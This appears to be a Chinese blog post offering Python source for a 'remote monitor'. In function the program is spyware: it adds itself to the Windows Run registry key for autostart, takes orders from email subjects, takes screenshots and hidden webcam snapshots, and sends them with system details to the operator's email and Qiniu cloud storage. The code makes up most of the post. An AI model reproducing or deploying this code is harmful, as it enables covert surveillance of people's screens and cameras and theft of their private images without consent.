python远程监控
最近用python写了一个远程监控的程序,主要功能有:1.获取系统信息 2.对屏幕进行截图,屏幕截图发送到邮箱 3.可以用摄像头获取图片,这些图片上传到七牛 4.开机自启动
1import win32api
2import win32con
3import platform
4import socket
5import time
6import os
7import smtplib
8import poplib
9from VideoCapture import Device
10from email.mime.multipart import MIMEMultipart
11from email.mime.text import MIMEText
12from email.mime.image import MIMEImage
13import poplib,email
14from email.header import decode_header
15from PIL import ImageGrab
16import qiniu.conf
17import qiniu.io
18import qiniu.rs
19#去七牛申请
20qiniu.conf.ACCESS_KEY = ""
21qiniu.conf.SECRET_KEY = ""
22#获取ip
23def getIP():
24 ip=socket.gethostbyname(socket.gethostname())
25 return ip
26#获取操作系统版本、
27def getSystemVersion():
28 return platform.platform()
29def send_Information(ip,system_version):
30 info='ip:'+ip+' '+'system version:'+system_version
31 print info
32 smtp=smtplib.SMTP()
33 smtp.connect('smtp.sina.com')
34 smtp.login('[email protected]','***') #改成自己的邮箱和密码
35 smtp.sendmail('[email protected]','[email protected]',ip+' '+system_version)#把接收邮箱改成自己另外一个邮箱
36#截图,图片名为截图时间
37def screen_capture():
38 #获取截图时间
39 pic_time=time.strftime('%Y%m%d%H%M%S',time.localtime(time.time()))
40 #pic_name='screen_capture'+time.strftime('%Y%m%d%H%M%S',time.localtime(time.time()))
41 pic_name='screen'+pic_time+'.jpg'
42 pic = ImageGrab.grab()
43 pic.save('%s' % pic_name)
44 print pic_name
45 #发送图片
46 send_Img(pic_time,pic_name)
47 print pic_name
48 os.remove(pic_name)#删除图片
49#发送截图图片到邮箱
50def send_Img(pic_time,pic_name):
51 msgRoot = MIMEMultipart('related')
52 msgRoot['Subject'] = pic_time
53 msgText = MIMEText('<b>capture</b> <br><img src="cid:image1">','html','utf-8')
54 msgRoot.attach(msgText)
55 #fp = open('F:\\1.jpg', 'rb')
56 fp = open(pic_name, 'rb')
57 msgImage = MIMEImage(fp.read())
58 fp.close()
59 msgImage.add_header('Content-ID', '<image1>')
60 msgRoot.attach(msgImage)
61 smtp = smtplib.SMTP()
62 smtp.connect('smtp.sina.com','25')
63 smtp.login("[email protected]","*****")
64 smtp.sendmail("[email protected]","[email protected]", msgRoot.as_string())
65 smtp.quit()
66 print 'send success'
67#摄像头截图,每隔SLEEP_TIME秒截取一张
68def camera_capture():
69 #抓取频率
70 SLEEP_TIME=3
71 i=0
72 cam=Device(devnum=0, showVideoWindow=0)
73 while i<10:
74 cam_time=time.strftime('%Y%m%d%H%M%S',time.localtime(time.time()))
75 cam_name='camera'+cam_time+'.jpg'
76 cam.saveSnapshot(cam_name,3,1,'bl')
77 camera_upload(cam_name)
78 print str(i)+cam_name
79 os.remove(cam_name)
80 time.sleep(SLEEP_TIME)
81 i+=1
82 #上传到七牛
83def camera_upload(file):
84 policy = qiniu.rs.PutPolicy('iloster') #空间名,iloster是我的空间名
85 uptoken = policy.token()
86 ret, err = qiniu.io.put_file(uptoken, None, file)
87 if err is not None:
88 sys.stderr.write('error: %s ' % err)
89#获取最新邮件
90def accept_mail():
91 pop=poplib.POP3_SSL('pop.qq.com')
92 pop.user('[email protected]')
93 pop.pass_('*****')
94 #获取邮件数目
95 (num,totalSize)=pop.stat()
96 #获取最新的邮件
97 (heard,msg,octets)=pop.retr(num)
98 mail=email.message_from_string("\n".join(msg))
99 subject=email.Header.decode_header(mail['subject'])[0][0] #标题
100 pop.quit()
101 return subject
102#获得程序的路径
103def getPath():
104 path=os.getcwd()+'\Remote.exe' #最后打包的exe程序名必须为Remote.exe,或者把这里改一下
105 print path
106 return path
107#添加开机自启动,在注册表里注册
108def add_start(path):
109 subkey='SOFTWARE\Microsoft\Windows\CurrentVersion\Run'
110 key=win32api.RegOpenKey(win32con.HKEY_LOCAL_MACHINE,subkey,0,win32con.KEY_ALL_ACCESS)
111 #print win32api.RegQueryValueEx(key,'python')
112 win32api.RegSetValueEx(key,'python',0,win32con.REG_SZ,path)
113 print win32api.RegQueryValueEx(key,'python')
114if __name__=='__main__':
115 add_start(getPath()) #添加开机自启动
116 send_Information(getIP(),getSystemVersion())
117 while 1: #不断的监听
118 if accept_mail()=='screen': #当获取的邮件主题为screen时,截取屏幕信息
119 screen_capture()
120 elif accept_mail()=='camera':
121 camera_capture()
1.我的发送邮箱是sina邮箱,接收邮箱是qq邮箱,这样做是因为微信可以绑定qq邮箱。
2.accept_mail()监听的邮箱是自己的接收邮箱,就是我用的qq邮箱。
3.当监听到screen时,开始屏幕截图并发送到邮箱,由于监听的是最新的邮件,当图片发送带邮箱时,获取的邮件主题不是screen了,应该会停止截图,最后只会截取一张图片,继续保持监听状态。但实际由于网络的原因,发送的邮件会有延迟,所以,实际截取的图片会有很多张。
4.当监听到camera时,会用摄像头截图,如果把while i<10,改成i=1,会让摄像头一直截图,并使其他命令失效,所以我i<10,就是每获取一次命令,截图10张 。
注:本篇来自于互联网,未进行代码验证其可用性。
捐赠本站(Donate)
如您感觉文章有用,可扫码捐赠本站!(If the article useful, you can scan the QR code to donate))
- Author: shisekong
- Link: https://blog.361way.com/python-remote-monitor/4425.html
- License: This work is under a 知识共享署名-非商业性使用-禁止演绎 4.0 国际许可协议. Kindly fulfill the requirements of the aforementioned License when adapting or creating a derivative of this work.